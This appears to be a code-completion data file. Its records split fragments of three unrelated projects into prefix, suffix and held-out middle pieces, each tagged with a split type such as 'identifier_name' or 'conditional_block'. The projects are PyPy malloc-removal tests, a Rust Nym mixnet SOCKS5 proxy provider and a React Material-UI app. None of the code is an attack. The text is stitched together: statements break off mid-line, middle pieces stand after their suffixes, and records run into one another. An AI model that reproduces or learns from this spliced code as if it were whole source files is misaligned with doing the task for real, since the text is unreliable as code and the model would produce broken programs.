return px[0] + s.y + pz[0]
self.check(fn, [], [], 42)
def test_getarraysubstruct(self):
py.test.skip("fails because of the interior structure changes")
U = lltype.Struct('U', ('n', lltype.Signed))
for length in [1, 2]:
S = lltype.GcStruct('S', ('a', lltype.FixedSizeArray(U, length)))
for index in range(length):
def fn():
s = lltype.malloc(S)
s.a[index].n = 12
return s.a[index].n
self.check(fn, [], [], 12)
def test_ptr_nonzero(self):
S = lltype.GcStruct('S')
def fn():
s = lltype.malloc(S)
return bool(s)
self.check(fn, [], [], True)
def test_substruct_not_accessed(self):
SMALL = lltype.Struct('SMALL', ('x', lltype.Signed))
BIG = lltype.GcStruct('BIG', ('z', lltype.Signed), ('s', SMALL))
def fn():
x = lltype.malloc(BIG)
while x.z < 10: # makes several blocks
x.z += 3
return x.z
self.check(fn, [], [], 12)
def test_union(self):
py.test.skip("fails because of the interior structure changes")
UNION = lltype.Struct('UNION', ('a', lltype.Signed), ('b', lltype.Signed),
hints = {'union': True})
BIG = lltype.GcStruct('BIG', ('u1', UNION), ('u2', UNION))
def fn():
x = lltype.malloc(BIG)
x.u1.a = 3
x.u2.b = 6
return x.u1.b * x.u2.a
self.check(fn, [], [], Ellipsis)
def test_keep_all_keepalives(self):
SIZE = llmemory.sizeof(lltype.Signed)
PARRAY = lltype.Ptr(lltype.FixedSizeArray(lltype.Signed, 1))
class A:
def __init__(self):
|
random_line_split
|
||
test_malloc.py
|
check_malloc_removed = classmethod(check_malloc_removed)
def check(self, fn, signature, args, expected_result, must_be_removed=True,
inline=None):
remover = self.MallocRemover()
t = TranslationContext()
t.buildannotator().build_types(fn, signature)
t.buildrtyper().specialize()
graph = graphof(t, fn)
if inline is not None:
from rpython.translator.backendopt.inline import auto_inline_graphs
auto_inline_graphs(t, t.graphs, inline)
if option.view:
t.view()
# to detect broken intermediate graphs,
# we do the loop ourselves instead of calling remove_simple_mallocs()
while True:
progress = remover.remove_mallocs_once(graph)
simplify.transform_dead_op_vars_in_blocks(list(graph.iterblocks()),
[graph])
if progress and option.view:
t.view()
if expected_result is not Ellipsis:
interp = LLInterpreter(t.rtyper)
res = interp.eval_graph(graph, args)
assert res == expected_result
if not progress:
break
if must_be_removed:
self.check_malloc_removed(graph)
return graph
def test_fn1(self):
def fn1(x, y):
if x > 0:
t = x+y, x-y
else:
|
s, d = t
return s*d
self.check(fn1, [int, int], [15, 10], 125)
def test_fn2(self):
class T:
pass
def fn2(x, y):
t = T()
t.x = x
t.y = y
if x > 0:
return t.x + t.y
else:
return t.x - t.y
self.check(fn2, [int, int], [-6, 7], -13)
def test_fn3(self):
def fn3(x):
a, ((b, c), d, e) = x+1, ((x+2, x+3), x+4, x+5)
return a+b+c+d+e
self.check(fn3, [int], [10], 65)
def test_fn4(self):
class A:
pass
class B(A):
pass
def fn4(i):
a = A()
b = B()
a.b = b
b.i = i
return a.b.i
self.check(fn4, [int], [42], 42)
def test_fn5(self):
class A:
attr = 666
class B(A):
attr = 42
def fn5():
b = B()
return b.attr
self.check(fn5, [], [], 42)
def test_aliasing(self):
class A:
pass
def fn6(n):
a1 = A()
a1.x = 5
a2 = A()
a2.x = 6
if n > 0:
a = a1
else:
a = a2
a.x = 12
return a1.x
self.check(fn6, [int], [1], 12, must_be_removed=False)
def test_bogus_cast_pointer(self):
class S:
pass
class T(S):
def f(self):
self.y += 1
def f(x):
T().y = 5
s = S()
s.x = 123
if x < 0:
s.f()
return s.x
graph = self.check(f, [int], [5], 123, inline=20)
found_operations = {}
for block in graph.iterblocks():
for op in block.operations:
found_operations[op.opname] = True
assert 'debug_fatalerror' in found_operations
def test_dont_remove_with__del__(self):
import os
delcalls = [0]
class A(object):
nextid = 0
def __init__(self):
self.id = self.nextid
self.nextid += 1
def __del__(self):
delcalls[0] += 1
#os.write(1, "__del__\n")
def f(x=int):
a = A()
i = 0
while i < x:
a = A()
os.write(1, str(delcalls[0]) + "\n")
i += 1
return 1
t = TranslationContext()
t.buildannotator().build_types(f, [int])
t.buildrtyper().specialize()
graph = graphof(t, f)
backend_optimizations(t)
op = graph.startblock.exits[0].target.exits[1].target.operations[0]
assert op.opname == "malloc"
def test_wrapper_cannot_be_removed(self):
SMALL = lltype.OpaqueType('SMALL')
BIG = lltype.GcStruct('BIG', ('z', lltype.Signed), ('s', SMALL))
def g(small):
return -1
def fn():
b = lltype.malloc(BIG)
g(b.s)
self.check(fn, [], [], None, must_be_removed=False)
def test_direct_fieldptr(self):
S = lltype.GcStruct('S', ('x', lltype.Signed))
def fn():
s = lltype.malloc(S)
s.x = 11
p = lltype.direct_fieldptr(s, 'x')
return p[0]
self.check(fn, [], [], 11)
def test_direct_fieldptr_2(self):
T = lltype.GcStruct('T', ('z', lltype.Signed))
S = lltype.GcStruct('S', ('t', T),
('x', lltype.Signed),
('y', lltype.Signed))
def fn():
s = lltype.malloc(S)
s.x = 10
s.t.z = 1
px = lltype.direct_fieldptr(s, 'x')
py = lltype.direct_fieldptr(s, 'y')
pz = lltype.direct_fieldptr(s.t, 'z')
py[0] = 31
return px[0] + s.y + pz[0]
self.check(fn, [], [], 42)
def test_getarraysubstruct(self):
py.test.skip("fails because of the interior structure changes")
U = lltype.Struct('U', ('n', lltype.Signed))
for length in [1, 2]:
S = lltype.GcStruct('S', ('a', lltype.FixedSizeArray(U, length)))
for index in range(length):
def fn():
s = lltype.malloc(S)
s.a[index].n = 12
return s.a[index].n
self.check(fn, [], [], 12)
def test_ptr_nonzero(self):
S = lltype.GcStruct('S')
def fn():
s = lltype.malloc(S)
return bool(s)
self.check(fn, [], [], True)
def test_substruct_not_accessed(self):
SMALL = lltype.Struct('SMALL', ('x', lltype.Signed))
BIG = lltype.GcStruct('BIG', ('z', lltype.Signed), ('s', SMALL))
def fn():
x = lltype.malloc(BIG)
while x.z < 10: # makes several blocks
x.z += 3
return x.z
self.check(fn, [], [], 12)
def test_union(self):
py.test.skip("fails because of the interior structure changes")
UNION = lltype.Struct('UNION', ('a', lltype.Signed), ('b', lltype.Signed),
hints = {'union': True})
BIG = lltype.GcStruct('BIG', ('u1', UNION), ('u2', UNION))
def fn():
x = lltype.malloc(BIG)
x.u1.a = 3
x.u2.b = 6
return x.u1.b * x.u2.a
self.check(fn, [], [], Ellipsis)
def test_keep_all_keepalives(self):
SIZE = llmemory.sizeof(lltype.Signed)
PARRAY = lltype.Ptr(lltype.FixedSizeArray(lltype.Signed, 1))
class A:
def __init__(self):
self.addr = llmemory.raw_malloc(SIZE)
def __del__(self):
llmemory.raw_free(self.addr)
class B:
pass
def myfunc():
b = B()
b.keep = A()
b.data = llmemory.cast_adr_to_ptr(b.keep.addr, PARRAY)
b.data[0] = 42
ptr = b.data
# normally 'b' could go away as early as here, which would free
# the memory held by the instance of A in b.keep...
res = ptr[0]
# ...so we explicitly keep 'b' alive until here
objectmodel.keepalive_until_here(b)
return res
graph = self.check(myfunc, [], [], 42,
must_be_removed=False) # '
|
t = x-y, x+y
|
conditional_block
|
core.rs
|
Technologies SA <contact@nymtech.net>
// SPDX-License-Identifier: Apache-2.0
use crate::allowed_hosts::{HostsStore, OutboundRequestFilter};
use crate::connection::Connection;
use crate::websocket;
use crate::websocket::TSWebsocketStream;
use futures::channel::mpsc;
use futures::stream::{SplitSink, SplitStream};
use futures::{SinkExt, StreamExt};
use log::*;
use nymsphinx::addressing::clients::Recipient;
use nymsphinx::receiver::ReconstructedMessage;
use proxy_helpers::connection_controller::{Controller, ControllerCommand, ControllerSender};
use socks5_requests::{ConnectionId, Request, Response};
use std::path::PathBuf;
use std::sync::atomic::{AtomicUsize, Ordering};
use tokio_tungstenite::tungstenite::protocol::Message;
use websocket::WebsocketConnectionError;
use websocket_requests::{requests::ClientRequest, responses::ServerResponse};
// Since it's an atomic, it's safe to be kept static and shared across threads
static ACTIVE_PROXIES: AtomicUsize = AtomicUsize::new(0);
pub struct ServiceProvider {
listening_address: String,
outbound_request_filter: OutboundRequestFilter,
open_proxy: bool,
}
impl ServiceProvider {
pub fn new(listening_address: String, open_proxy: bool) -> ServiceProvider {
let allowed_hosts = HostsStore::new(
HostsStore::default_base_dir(),
PathBuf::from("allowed.list"),
);
let unknown_hosts = HostsStore::new(
HostsStore::default_base_dir(),
PathBuf::from("unknown.list"),
);
let outbound_request_filter = OutboundRequestFilter::new(allowed_hosts, unknown_hosts);
ServiceProvider {
listening_address,
outbound_request_filter,
open_proxy,
}
}
/// Listens for any messages from `mix_reader` that should be written back to the mix network
/// via the `websocket_writer`.
async fn mixnet_response_listener(
mut websocket_writer: SplitSink<TSWebsocketStream, Message>,
mut mix_reader: mpsc::UnboundedReceiver<(Response, Recipient)>,
) {
// TODO: wire SURBs in here once they're available
while let Some((response, return_address)) = mix_reader.next().await {
// make 'request' to native-websocket client
let response_message = ClientRequest::Send {
recipient: return_address,
message: response.into_bytes(),
with_reply_surb: false,
};
let message = Message::Binary(response_message.serialize());
websocket_writer.send(message).await.unwrap();
}
}
async fn read_websocket_message(
websocket_reader: &mut SplitStream<TSWebsocketStream>,
) -> Option<ReconstructedMessage> {
while let Some(msg) = websocket_reader.next().await {
let data = msg
.expect("we failed to read from the websocket!")
.into_data();
// try to recover the actual message from the mix network...
let deserialized_message = match ServerResponse::deserialize(&data) {
Ok(deserialized) => deserialized,
Err(err) => {
error!(
"Failed to deserialize received websocket message! - {}",
err
);
continue;
}
};
let received = match deserialized_message {
ServerResponse::Received(received) => received,
ServerResponse::Error(err) => {
panic!("received error from native client! - {}", err)
}
_ => unimplemented!("probably should never be reached?"),
};
return Some(received);
}
None
}
async fn start_proxy(
conn_id: ConnectionId,
remote_addr: String,
return_address: Recipient,
controller_sender: ControllerSender,
mix_input_sender: mpsc::UnboundedSender<(Response, Recipient)>,
) {
let mut conn = match Connection::new(conn_id, remote_addr.clone(), return_address).await {
Ok(conn) => conn,
Err(err) => {
error!(
"error while connecting to {:?} ! - {:?}",
remote_addr.clone(),
err
);
// inform the remote that the connection is closed before it even was established
mix_input_sender
.unbounded_send((Response::new(conn_id, Vec::new(), true), return_address))
.unwrap();
return;
}
};
// Connect implies it's a fresh connection - register it with our controller
let (mix_sender, mix_receiver) = mpsc::unbounded();
controller_sender
.unbounded_send(ControllerCommand::Insert(conn_id, mix_sender))
.unwrap();
let old_count = ACTIVE_PROXIES.fetch_add(1, Ordering::SeqCst);
info!(
"Starting proxy for {} (currently there are {} proxies being handled)",
remote_addr,
old_count + 1
);
// run the proxy on the connection
conn.run_proxy(mix_receiver, mix_input_sender).await;
// proxy is done - remove the access channel from the controller
controller_sender
.unbounded_send(ControllerCommand::Remove(conn_id))
.unwrap();
let old_count = ACTIVE_PROXIES.fetch_sub(1, Ordering::SeqCst);
info!(
"Proxy for {} is finished (currently there are {} proxies being handled)",
remote_addr,
old_count - 1
);
}
fn handle_proxy_connect(
&mut self,
controller_sender: &mut ControllerSender,
mix_input_sender: &mpsc::UnboundedSender<(Response, Recipient)>,
conn_id: ConnectionId,
remote_addr: String,
return_address: Recipient,
) {
if !self.open_proxy && !self.outbound_request_filter.check(&remote_addr) {
log::info!("Domain {:?} failed filter check", remote_addr);
return;
}
let controller_sender_clone = controller_sender.clone();
let mix_input_sender_clone = mix_input_sender.clone();
// and start the proxy for this connection
tokio::spawn(async move {
Self::start_proxy(
conn_id,
remote_addr,
return_address,
controller_sender_clone,
mix_input_sender_clone,
)
.await
});
}
fn handle_proxy_send(
&self,
controller_sender: &mut ControllerSender,
conn_id: ConnectionId,
data: Vec<u8>,
closed: bool,
) {
controller_sender
.unbounded_send(ControllerCommand::Send(conn_id, data, closed))
.unwrap()
}
fn handle_proxy_request(
&mut self,
raw_request: &[u8],
controller_sender: &mut ControllerSender,
mix_input_sender: &mpsc::UnboundedSender<(Response, Recipient)>,
) {
// try to treat each received mix message as a service provider request
let deserialized_request = match Request::try_from_bytes(raw_request) {
Ok(request) => request,
Err(err) => {
error!("Failed to deserialized received request! - {}", err);
return;
}
};
match deserialized_request {
Request::Connect {
conn_id,
remote_addr,
return_address,
} => self.handle_proxy_connect(
controller_sender,
mix_input_sender,
conn_id,
remote_addr,
return_address,
),
Request::Send(conn_id, data, closed) => {
self.handle_proxy_send(controller_sender, conn_id, data, closed)
}
}
}
/// Start all subsystems
pub async fn run(&mut self) {
let websocket_stream = self.connect_websocket(&self.listening_address).await;
// split the websocket so that we could read and write from separate threads
let (websocket_writer, mut websocket_reader) = websocket_stream.split();
// channels responsible for managing messages that are to be sent to the mix network. The receiver is
// going to be used by `mixnet_response_listener`
let (mix_input_sender, mix_input_receiver) = mpsc::unbounded::<(Response, Recipient)>();
// controller for managing all active connections
let (mut active_connections_controller, mut controller_sender) = Controller::new();
tokio::spawn(async move {
active_connections_controller.run().await;
});
// start the listener for mix messages
tokio::spawn(async move {
Self::mixnet_response_listener(websocket_writer, mix_input_receiver).await;
});
println!("\nAll systems go. Press CTRL-C to stop the server.");
// for each incoming message from the websocket... (which in 99.99% cases is going to be a mix message)
loop {
let received = match Self::read_websocket_message(&mut websocket_reader).await {
Some(msg) => msg,
None => {
error!("The websocket stream has finished!");
return;
}
};
let raw_message = received.message;
// TODO: here be potential SURB (i.e. received.reply_SURB)
self.handle_proxy_request(&raw_message, &mut controller_sender, &mix_input_sender)
}
}
// Make the websocket connection so we can receive incoming Mixnet messages.
async fn
|
(&self, uri: &str) -> TSWebsocketStream {
let ws_stream = match websocket::Connection::new(uri).connect().await {
Ok(ws_stream) => {
info!("* connected to local websocket server at {}", uri);
ws_stream
}
Err(WebsocketConnectionError::ConnectionNotEstablished) => {
panic!("
|
connect_websocket
|
identifier_name
|
core.rs
|
Technologies SA <contact@nymtech.net>
// SPDX-License-Identifier: Apache-2.0
use crate::allowed_hosts::{HostsStore, OutboundRequestFilter};
use crate::connection::Connection;
use crate::websocket;
use crate::websocket::TSWebsocketStream;
use futures::channel::mpsc;
use futures::stream::{SplitSink, SplitStream};
use futures::{SinkExt, StreamExt};
use log::*;
use nymsphinx::addressing::clients::Recipient;
use nymsphinx::receiver::ReconstructedMessage;
use proxy_helpers::connection_controller::{Controller, ControllerCommand, ControllerSender};
use socks5_requests::{ConnectionId, Request, Response};
use std::path::PathBuf;
use std::sync::atomic::{AtomicUsize, Ordering};
use tokio_tungstenite::tungstenite::protocol::Message;
use websocket::WebsocketConnectionError;
use websocket_requests::{requests::ClientRequest, responses::ServerResponse};
// Since it's an atomic, it's safe to be kept static and shared across threads
static ACTIVE_PROXIES: AtomicUsize = AtomicUsize::new(0);
pub struct ServiceProvider {
listening_address: String,
outbound_request_filter: OutboundRequestFilter,
open_proxy: bool,
}
impl ServiceProvider {
pub fn new(listening_address: String, open_proxy: bool) -> ServiceProvider {
let allowed_hosts = HostsStore::new(
HostsStore::default_base_dir(),
PathBuf::from("allowed.list"),
);
let unknown_hosts = HostsStore::new(
HostsStore::default_base_dir(),
PathBuf::from("unknown.list"),
);
let outbound_request_filter = OutboundRequestFilter::new(allowed_hosts, unknown_hosts);
ServiceProvider {
listening_address,
outbound_request_filter,
open_proxy,
}
}
/// Listens for any messages from `mix_reader` that should be written back to the mix network
/// via the `websocket_writer`.
async fn mixnet_response_listener(
mut websocket_writer: SplitSink<TSWebsocketStream, Message>,
mut mix_reader: mpsc::UnboundedReceiver<(Response, Recipient)>,
) {
// TODO: wire SURBs in here once they're available
while let Some((response, return_address)) = mix_reader.next().await {
// make 'request' to native-websocket client
let response_message = ClientRequest::Send {
recipient: return_address,
message: response.into_bytes(),
with_reply_surb: false,
};
let message = Message::Binary(response_message.serialize());
websocket_writer.send(message).await.unwrap();
}
}
async fn read_websocket_message(
websocket_reader: &mut SplitStream<TSWebsocketStream>,
) -> Option<ReconstructedMessage> {
while let Some(msg) = websocket_reader.next().await {
let data = msg
.expect("we failed to read from the websocket!")
.into_data();
// try to recover the actual message from the mix network...
let deserialized_message = match ServerResponse::deserialize(&data) {
Ok(deserialized) => deserialized,
Err(err) => {
error!(
"Failed to deserialize received websocket message! - {}",
err
);
continue;
}
};
let received = match deserialized_message {
ServerResponse::Received(received) => received,
ServerResponse::Error(err) => {
panic!("received error from native client! - {}", err)
}
_ => unimplemented!("probably should never be reached?"),
};
return Some(received);
}
None
}
async fn start_proxy(
conn_id: ConnectionId,
remote_addr: String,
return_address: Recipient,
controller_sender: ControllerSender,
mix_input_sender: mpsc::UnboundedSender<(Response, Recipient)>,
) {
let mut conn = match Connection::new(conn_id, remote_addr.clone(), return_address).await {
Ok(conn) => conn,
Err(err) => {
error!(
"error while connecting to {:?} ! - {:?}",
remote_addr.clone(),
err
);
// inform the remote that the connection is closed before it even was established
mix_input_sender
.unbounded_send((Response::new(conn_id, Vec::new(), true), return_address))
.unwrap();
return;
}
};
// Connect implies it's a fresh connection - register it with our controller
let (mix_sender, mix_receiver) = mpsc::unbounded();
controller_sender
.unbounded_send(ControllerCommand::Insert(conn_id, mix_sender))
.unwrap();
let old_count = ACTIVE_PROXIES.fetch_add(1, Ordering::SeqCst);
info!(
"Starting proxy for {} (currently there are {} proxies being handled)",
remote_addr,
old_count + 1
);
// run the proxy on the connection
conn.run_proxy(mix_receiver, mix_input_sender).await;
// proxy is done - remove the access channel from the controller
controller_sender
.unbounded_send(ControllerCommand::Remove(conn_id))
.unwrap();
let old_count = ACTIVE_PROXIES.fetch_sub(1, Ordering::SeqCst);
info!(
"Proxy for {} is finished (currently there are {} proxies being handled)",
remote_addr,
old_count - 1
);
}
fn handle_proxy_connect(
&mut self,
controller_sender: &mut ControllerSender,
mix_input_sender: &mpsc::UnboundedSender<(Response, Recipient)>,
conn_id: ConnectionId,
remote_addr: String,
return_address: Recipient,
) {
if !self.open_proxy && !self.outbound_request_filter.check(&remote_addr) {
log::info!("Domain {:?} failed filter check", remote_addr);
return;
}
let controller_sender_clone = controller_sender.clone();
let mix_input_sender_clone = mix_input_sender.clone();
// and start the proxy for this connection
tokio::spawn(async move {
Self::start_proxy(
conn_id,
remote_addr,
return_address,
controller_sender_clone,
mix_input_sender_clone,
)
.await
});
}
fn handle_proxy_send(
&self,
controller_sender: &mut ControllerSender,
conn_id: ConnectionId,
data: Vec<u8>,
closed: bool,
) {
controller_sender
.unbounded_send(ControllerCommand::Send(conn_id, data, closed))
.unwrap()
}
fn handle_proxy_request(
&mut self,
raw_request: &[u8],
controller_sender: &mut ControllerSender,
mix_input_sender: &mpsc::UnboundedSender<(Response, Recipient)>,
)
|
return_address,
),
Request::Send(conn_id, data, closed) => {
self.handle_proxy_send(controller_sender, conn_id, data, closed)
}
}
}
/// Start all subsystems
pub async fn run(&mut self) {
let websocket_stream = self.connect_websocket(&self.listening_address).await;
// split the websocket so that we could read and write from separate threads
let (websocket_writer, mut websocket_reader) = websocket_stream.split();
// channels responsible for managing messages that are to be sent to the mix network. The receiver is
// going to be used by `mixnet_response_listener`
let (mix_input_sender, mix_input_receiver) = mpsc::unbounded::<(Response, Recipient)>();
// controller for managing all active connections
let (mut active_connections_controller, mut controller_sender) = Controller::new();
tokio::spawn(async move {
active_connections_controller.run().await;
});
// start the listener for mix messages
tokio::spawn(async move {
Self::mixnet_response_listener(websocket_writer, mix_input_receiver).await;
});
println!("\nAll systems go. Press CTRL-C to stop the server.");
// for each incoming message from the websocket... (which in 99.99% cases is going to be a mix message)
loop {
let received = match Self::read_websocket_message(&mut websocket_reader).await {
Some(msg) => msg,
None => {
error!("The websocket stream has finished!");
return;
}
};
let raw_message = received.message;
// TODO: here be potential SURB (i.e. received.reply_SURB)
self.handle_proxy_request(&raw_message, &mut controller_sender, &mix_input_sender)
}
}
// Make the websocket connection so we can receive incoming Mixnet messages.
async fn connect_websocket(&self, uri: &str) -> TSWebsocketStream {
let ws_stream = match websocket::Connection::new(uri).connect().await {
Ok(ws_stream) => {
info!("* connected to local websocket server at {}", uri);
ws_stream
}
Err(WebsocketConnectionError::ConnectionNotEstablished) => {
panic!("
|
{
// try to treat each received mix message as a service provider request
let deserialized_request = match Request::try_from_bytes(raw_request) {
Ok(request) => request,
Err(err) => {
error!("Failed to deserialized received request! - {}", err);
return;
}
};
match deserialized_request {
Request::Connect {
conn_id,
remote_addr,
return_address,
} => self.handle_proxy_connect(
controller_sender,
mix_input_sender,
conn_id,
remote_addr,
|
identifier_body
|
core.rs
|
Technologies SA <contact@nymtech.net>
// SPDX-License-Identifier: Apache-2.0
use crate::allowed_hosts::{HostsStore, OutboundRequestFilter};
use crate::connection::Connection;
use crate::websocket;
use crate::websocket::TSWebsocketStream;
use futures::channel::mpsc;
use futures::stream::{SplitSink, SplitStream};
use futures::{SinkExt, StreamExt};
use log::*;
use nymsphinx::addressing::clients::Recipient;
use nymsphinx::receiver::ReconstructedMessage;
use proxy_helpers::connection_controller::{Controller, ControllerCommand, ControllerSender};
use socks5_requests::{ConnectionId, Request, Response};
use std::path::PathBuf;
use std::sync::atomic::{AtomicUsize, Ordering};
use tokio_tungstenite::tungstenite::protocol::Message;
use websocket::WebsocketConnectionError;
use websocket_requests::{requests::ClientRequest, responses::ServerResponse};
// Since it's an atomic, it's safe to be kept static and shared across threads
static ACTIVE_PROXIES: AtomicUsize = AtomicUsize::new(0);
pub struct ServiceProvider {
listening_address: String,
outbound_request_filter: OutboundRequestFilter,
open_proxy: bool,
}
impl ServiceProvider {
pub fn new(listening_address: String, open_proxy: bool) -> ServiceProvider {
let allowed_hosts = HostsStore::new(
HostsStore::default_base_dir(),
PathBuf::from("allowed.list"),
);
let unknown_hosts = HostsStore::new(
HostsStore::default_base_dir(),
PathBuf::from("unknown.list"),
);
let outbound_request_filter = OutboundRequestFilter::new(allowed_hosts, unknown_hosts);
ServiceProvider {
listening_address,
outbound_request_filter,
open_proxy,
}
}
/// Listens for any messages from `mix_reader` that should be written back to the mix network
/// via the `websocket_writer`.
async fn mixnet_response_listener(
|
mut mix_reader: mpsc::UnboundedReceiver<(Response, Recipient)>,
) {
// TODO: wire SURBs in here once they're available
while let Some((response, return_address)) = mix_reader.next().await {
// make 'request' to native-websocket client
let response_message = ClientRequest::Send {
recipient: return_address,
message: response.into_bytes(),
with_reply_surb: false,
};
let message = Message::Binary(response_message.serialize());
websocket_writer.send(message).await.unwrap();
}
}
async fn read_websocket_message(
websocket_reader: &mut SplitStream<TSWebsocketStream>,
) -> Option<ReconstructedMessage> {
while let Some(msg) = websocket_reader.next().await {
let data = msg
.expect("we failed to read from the websocket!")
.into_data();
// try to recover the actual message from the mix network...
let deserialized_message = match ServerResponse::deserialize(&data) {
Ok(deserialized) => deserialized,
Err(err) => {
error!(
"Failed to deserialize received websocket message! - {}",
err
);
continue;
}
};
let received = match deserialized_message {
ServerResponse::Received(received) => received,
ServerResponse::Error(err) => {
panic!("received error from native client! - {}", err)
}
_ => unimplemented!("probably should never be reached?"),
};
return Some(received);
}
None
}
async fn start_proxy(
conn_id: ConnectionId,
remote_addr: String,
return_address: Recipient,
controller_sender: ControllerSender,
mix_input_sender: mpsc::UnboundedSender<(Response, Recipient)>,
) {
let mut conn = match Connection::new(conn_id, remote_addr.clone(), return_address).await {
Ok(conn) => conn,
Err(err) => {
error!(
"error while connecting to {:?} ! - {:?}",
remote_addr.clone(),
err
);
// inform the remote that the connection is closed before it even was established
mix_input_sender
.unbounded_send((Response::new(conn_id, Vec::new(), true), return_address))
.unwrap();
return;
}
};
// Connect implies it's a fresh connection - register it with our controller
let (mix_sender, mix_receiver) = mpsc::unbounded();
controller_sender
.unbounded_send(ControllerCommand::Insert(conn_id, mix_sender))
.unwrap();
let old_count = ACTIVE_PROXIES.fetch_add(1, Ordering::SeqCst);
info!(
"Starting proxy for {} (currently there are {} proxies being handled)",
remote_addr,
old_count + 1
);
// run the proxy on the connection
conn.run_proxy(mix_receiver, mix_input_sender).await;
// proxy is done - remove the access channel from the controller
controller_sender
.unbounded_send(ControllerCommand::Remove(conn_id))
.unwrap();
let old_count = ACTIVE_PROXIES.fetch_sub(1, Ordering::SeqCst);
info!(
"Proxy for {} is finished (currently there are {} proxies being handled)",
remote_addr,
old_count - 1
);
}
fn handle_proxy_connect(
&mut self,
controller_sender: &mut ControllerSender,
mix_input_sender: &mpsc::UnboundedSender<(Response, Recipient)>,
conn_id: ConnectionId,
remote_addr: String,
return_address: Recipient,
) {
if !self.open_proxy && !self.outbound_request_filter.check(&remote_addr) {
log::info!("Domain {:?} failed filter check", remote_addr);
return;
}
let controller_sender_clone = controller_sender.clone();
let mix_input_sender_clone = mix_input_sender.clone();
// and start the proxy for this connection
tokio::spawn(async move {
Self::start_proxy(
conn_id,
remote_addr,
return_address,
controller_sender_clone,
mix_input_sender_clone,
)
.await
});
}
fn handle_proxy_send(
&self,
controller_sender: &mut ControllerSender,
conn_id: ConnectionId,
data: Vec<u8>,
closed: bool,
) {
controller_sender
.unbounded_send(ControllerCommand::Send(conn_id, data, closed))
.unwrap()
}
fn handle_proxy_request(
&mut self,
raw_request: &[u8],
controller_sender: &mut ControllerSender,
mix_input_sender: &mpsc::UnboundedSender<(Response, Recipient)>,
) {
// try to treat each received mix message as a service provider request
let deserialized_request = match Request::try_from_bytes(raw_request) {
Ok(request) => request,
Err(err) => {
error!("Failed to deserialized received request! - {}", err);
return;
}
};
match deserialized_request {
Request::Connect {
conn_id,
remote_addr,
return_address,
} => self.handle_proxy_connect(
controller_sender,
mix_input_sender,
conn_id,
remote_addr,
return_address,
),
Request::Send(conn_id, data, closed) => {
self.handle_proxy_send(controller_sender, conn_id, data, closed)
}
}
}
/// Start all subsystems
pub async fn run(&mut self) {
let websocket_stream = self.connect_websocket(&self.listening_address).await;
// split the websocket so that we could read and write from separate threads
let (websocket_writer, mut websocket_reader) = websocket_stream.split();
// channels responsible for managing messages that are to be sent to the mix network. The receiver is
// going to be used by `mixnet_response_listener`
let (mix_input_sender, mix_input_receiver) = mpsc::unbounded::<(Response, Recipient)>();
// controller for managing all active connections
let (mut active_connections_controller, mut controller_sender) = Controller::new();
tokio::spawn(async move {
active_connections_controller.run().await;
});
// start the listener for mix messages
tokio::spawn(async move {
Self::mixnet_response_listener(websocket_writer, mix_input_receiver).await;
});
println!("\nAll systems go. Press CTRL-C to stop the server.");
// for each incoming message from the websocket... (which in 99.99% cases is going to be a mix message)
loop {
let received = match Self::read_websocket_message(&mut websocket_reader).await {
Some(msg) => msg,
None => {
error!("The websocket stream has finished!");
return;
}
};
let raw_message = received.message;
// TODO: here be potential SURB (i.e. received.reply_SURB)
self.handle_proxy_request(&raw_message, &mut controller_sender, &mix_input_sender)
}
}
// Make the websocket connection so we can receive incoming Mixnet messages.
async fn connect_websocket(&self, uri: &str) -> TSWebsocketStream {
let ws_stream = match websocket::Connection::new(uri).connect().await {
Ok(ws_stream) => {
info!("* connected to local websocket server at {}", uri);
ws_stream
}
Err(WebsocketConnectionError::ConnectionNotEstablished) => {
panic!("Error
|
mut websocket_writer: SplitSink<TSWebsocketStream, Message>,
|
random_line_split
|
App.js
|
from '@material-ui/icons/ChevronLeft';
import MenuIcon from '@material-ui/icons/Menu';
import SearchIcon from '@material-ui/icons/Search';
import AccountCircle from '@material-ui/icons/AccountCircle';
import NotificationsIcon from '@material-ui/icons/Notifications';
import ArrowDropDownIcon from '@material-ui/icons/ArrowDropDown';
import ListItems from './listItems.js'; // HACE UNA IMPORTACION DE LAS
import IMAGEN from './img/Imagen.js';
import {useHistory} from "react-router-dom";
import { BrowserRouter as Router, Route, Switch} from 'react-router-dom';
import ProdumarDuran from './Pages/ProdumarDuran.js';
import ProdumarTaura from './Pages/ProdumarTaura.js';
import Inicio from './Pages/Inicio.js';
import Registro_CLIENTE from './components/formularios/Registro_CLIENTE.js';
import Registro_Camaronera from './components/formularios/Registro_Camaronera.js';
|
let theme = createMuiTheme({
palette: {
primary: {
light: '#63ccff',
main: '#009be5',
dark: '#006db3',
},
},
typography: {
h5: {
fontWeight: 500,
fontSize: 26,
letterSpacing: 0.5,
},
},
shape: {
borderRadius: 8,
},
props: {
MuiTab: {
disableRipple: true,
},
},
mixins: {
toolbar: {
minHeight: 48,
},
},
});
theme = {
...theme,
overrides: {
MuiDrawer: {
paper: {
backgroundColor: '#212121', //Cambia el color del menú de opciones
},
},
MuiButton: {
label: {
textTransform: 'none',
},
contained: {
boxShadow: 'none',
'&:active': {
boxShadow: 'none',
},
},
},
MuiTabs: {
root: {
marginLeft: theme.spacing(1),
},
indicator: {
height: 3,
borderTopLeftRadius: 3,
borderTopRightRadius: 3,
backgroundColor: theme.palette.common.white,
},
},
MuiTab: {
root: {
textTransform: 'none',
margin: '0 16px',
minWidth: 0,
padding: 0,
[theme.breakpoints.up('md')]: {
padding: 0,
minWidth: 0,
},
},
},
MuiIconButton: {
root: {
padding: theme.spacing(1),
},
},
MuiTooltip: {
tooltip: {
borderRadius: 4,
},
},
MuiDivider: {
root: {
backgroundColor: '#404854',
},
},
MuiListItemText: {
primary: {
fontWeight: theme.typography.fontWeightMedium,
},
},
MuiListItemIcon: {
root: {
color: 'inherit',
marginRight: 0,
'& svg': {
fontSize: 20,
},
},
},
MuiAvatar: {
root: {
width: 32,
height: 32,
},
},
},
};
const drawerWidth = 240;
const useStyles = makeStyles((theme) =>({
tabs: {
borderLeft: `1px solid ${theme.palette.divider}`,
marginLeft: 1,
},
search: {
position: 'relative',
flexGrow: 1,
borderRadius: theme.shape.borderRadius,
backgroundColor: fade(theme.palette.common.white, 0.15),
'&:hover': {
backgroundColor: fade(theme.palette.common.white, 0.25),
},
marginLeft: 0,
width: '100%',
[theme.breakpoints.up('sm')]: {
marginLeft: theme.spacing(1),
width: 'auto',
},
},
searchIcon: {
padding: theme.spacing(0, 2),
height: '100%',
position: 'absolute',
pointerEvents: 'none',
display: 'flex',
alignItems: 'center',
justifyContent: 'center',
},
inputRoot: {
color: 'inherit',
},
inputInput: {
padding: theme.spacing(1, 1, 1, 0),
